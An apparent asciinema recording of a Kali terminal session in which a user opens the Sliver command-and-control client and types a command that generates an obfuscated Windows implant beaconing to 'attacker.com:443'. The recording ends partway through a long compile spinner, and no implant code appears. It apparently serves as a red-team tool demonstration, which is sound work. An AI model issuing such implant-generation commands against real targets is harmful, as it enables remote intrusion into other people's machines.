{"version": 2, "width": 137, "height": 38, "timestamp": 1702834090, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.084636, "o", "                                                                                                                                         \r\r"]
[0.137311, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mkali㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[0.137854, "o", "\u001b[?1h\u001b="]
[0.138805, "o", "\u001b[?2004h"]
[1.126586, "o", "\u001b[1ms\u001b[0m"]
[1.127617, "o", "\b\u001b[1ms\u001b[0m\u001b[38;2;153;153;153mliver\u001b[39m\b\b\b\b\b"]
[1.233311, "o", "\b\u001b[1ms\u001b[39m\u001b[1ml\u001b[0m"]
[1.341486, "o", "\b\b\u001b[1ms\u001b[1ml\u001b[39m\u001b[1mi\u001b[0m"]
[1.645373, "o", "\b\u001b[1mi\u001b[39m\u001b[1mv\u001b[0m\u001b[38;2;153;153;153mv\u001b[38;2;153;153;153me\u001b[38;2;153;153;153mr\u001b[39m\b\b\b"]
[1.651818, "o", "\b\u001b[1mv\u001b[39m\u001b[1me\u001b[0m\u001b[39m \u001b[39m \b\b"]
[1.652699, "o", "\u001b[38;2;153;153;153mr\u001b[39m\b"]
[1.724472, "o", "\b\b\b\b\b\u001b[0m\u001b[36ms\u001b[0m\u001b[36ml\u001b[0m\u001b[36mi\u001b[0m\u001b[36mv\u001b[0m\u001b[36me\u001b[36mr\u001b[39m"]
[2.169426, "o", "\u001b[?1l\u001b>"]
[2.172204, "o", "\u001b[?2004l\r\r\n"]
[2.23265, "o", "Connecting to localhost:31337 ...\r\n"]
[2.281037, "o", "\u001b[m"]
[2.283301, "o", "\u001b[32m\r\n    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗\r\n    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗\r\n    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝\r\n    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗\r\n    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║\r\n    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝\r\n\u001b[0m\r\nAll hackers gain epic\r\n"]
[2.283811, "o", "\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\n\r\n"]
[2.28395, "o", "\u001b[0m\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0m \b"]
[2.837538, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mg"]
[3.251842, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mge"]
[3.392601, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgen"]
[3.623616, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgene"]
[3.741996, "o", "\u001b[J\u001b[2K\r"]
[3.742093, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgener"]
[3.83311, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate "]
[4.377508, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate -"]
[4.529721, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --"]
[4.78866, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --m"]
[4.941, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mt"]
[5.111754, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtl"]
[5.516698, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls"]
[5.734855, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls "]
[6.152158, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls a"]
[6.361633, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls at"]
[6.522567, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls att"]
[6.664864, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls atta"]
[6.776953, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attac"]
[7.109455, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attack"]
[7.414159, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacke\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker"]
[7.645484, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker."]
[7.803638, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.c"]
[7.935967, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.co"]
[8.067311, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com"]
[8.852734, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:"]
[9.168342, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:4"]
[9.509949, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:44"]
[9.570568, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443"]
[9.902052, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 "]
[10.820721, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 -"]
[11.289457, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --s"]
[11.428343, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --sa"]
[11.800929, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --sav"]
[11.99739, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save "]
[13.047743, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save p"]
[13.076903, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save pa"]
[13.180503, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save pay"]
[13.371461, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payl"]
[13.541123, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save paylo"]
[13.701165, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payloa"]
[13.891736, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload"]
[14.228103, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload."]
[14.278758, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload.e"]
[14.505456, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload.ex"]
[14.748707, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload.exe"]
[14.995965, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload.exe\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mgenerate --mtls attacker.com:443 --save payload.exe\r\n"]
[14.996554, "o", "\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mGenerating new windows/amd64 implant binary\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m\u001b[1mSymbol obfuscation is enabled\u001b[0m\r\n"]
[15.09658, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[15.196943, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[15.297363, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[15.397811, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[15.498252, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[15.598621, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[15.698978, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[15.799391, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[15.899706, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[16.000093, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[16.100436, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[16.200834, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[16.301236, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[16.402302, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[16.502202, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[16.602606, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[16.703545, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[16.803923, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[16.904345, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[17.004804, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[17.107086, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[17.207448, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[17.30791, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[17.409979, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[17.510282, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[17.610686, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[17.711194, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[17.81158, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[17.91203, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[18.012607, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[18.113031, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[18.213472, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[18.313829, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[18.414224, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[18.514641, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[18.615006, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[18.715383, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[18.815764, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[18.916181, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[19.01654, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[19.116966, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[19.217444, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[19.317961, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[19.418386, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[19.518879, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[19.619285, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[19.719688, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[19.820085, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[19.920517, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[20.020952, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[20.121332, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[20.221723, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[20.322053, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[20.422471, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[20.522794, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[20.623194, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[20.723532, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[20.824103, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[20.924528, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[21.024932, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[21.125328, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[21.225707, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[21.326098, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[21.426502, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[21.526905, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[21.62734, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[21.727834, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[21.828239, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[21.928617, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[22.029032, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[22.129448, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[22.229866, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[22.330268, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[22.430544, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[22.531002, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[22.631396, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[22.731835, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[22.83223, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[22.932662, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[23.033073, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[23.13349, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[23.233919, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[23.334332, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[23.434734, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[23.53517, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[23.635537, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[23.735983, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[23.83638, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[23.936783, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[24.037207, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[24.137625, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[24.23802, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[24.338431, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[24.438844, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[24.539315, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[24.639859, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[24.740283, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[24.840563, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[24.940951, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[25.041341, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[25.141754, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[25.242166, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[25.342538, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[25.442828, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[25.543274, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[25.643646, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[25.744048, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[25.844474, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[25.944862, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[26.04527, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[26.145669, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[26.246022, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[26.346427, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[26.446809, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[26.547437, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[26.647862, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[26.748265, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[26.848674, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[26.949112, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[27.049475, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[27.149909, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[27.250325, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[27.350729, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[27.451181, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[27.551524, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[27.651964, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[27.752368, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[27.852712, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[27.953117, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[28.053487, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[28.153895, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[28.254303, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[28.354715, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[28.455174, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[28.55554, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[28.655917, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[28.756324, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[28.856721, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[28.957117, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[29.057518, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[29.157906, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[29.258323, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[29.358717, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[29.459162, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[29.559542, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[29.659969, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[29.760376, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[29.86079, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[29.961203, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[30.061614, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[30.162019, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[30.262452, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[30.362853, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[30.46329, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[30.563723, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[30.664103, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[30.764499, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[30.864915, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[30.96533, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[31.06574, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[31.166147, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[31.266538, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[31.366946, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[31.467353, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[31.567944, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[31.668315, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[31.768691, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[31.869066, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[31.969645, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[32.070051, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[32.170449, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[32.270833, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[32.372544, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[32.472682, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[32.573099, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[32.673483, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[32.773934, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[32.874324, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[32.974716, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[33.075158, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[33.175511, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[33.275897, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[33.376301, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[33.476709, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[33.577097, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[33.677502, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[33.777879, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[33.878273, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[33.978686, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[34.079087, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[34.179484, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[34.279882, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[34.380285, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[34.480707, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[34.581175, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[34.681719, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[34.782143, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[34.88255, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[34.982957, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[35.083382, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[35.183815, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[35.284217, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[35.384615, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[35.485015, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[35.585432, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[35.685846, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[35.786276, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[35.886653, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[35.987056, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[36.087455, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[36.187854, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[36.288268, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[36.388651, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[36.489017, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[36.58937, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[36.689809, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[36.790236, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[36.890643, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[36.991048, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[37.091435, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[37.191873, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[37.292274, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[37.392668, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[37.493089, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[37.593508, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[37.693939, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[37.794338, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[37.894747, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[37.995182, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[38.095547, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[38.19594, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[38.296325, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[38.396722, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[38.497121, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[38.597475, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[38.697889, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[38.798141, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[38.898535, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[38.998944, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[39.099317, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[39.199735, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[39.300148, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[39.400493, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[39.500894, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[39.601293, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[39.701696, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[39.802095, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[39.902516, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[40.003755, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[40.103282, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[40.203676, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[40.303955, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[40.404958, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[40.505368, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[40.60649, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[40.706993, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[40.807387, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
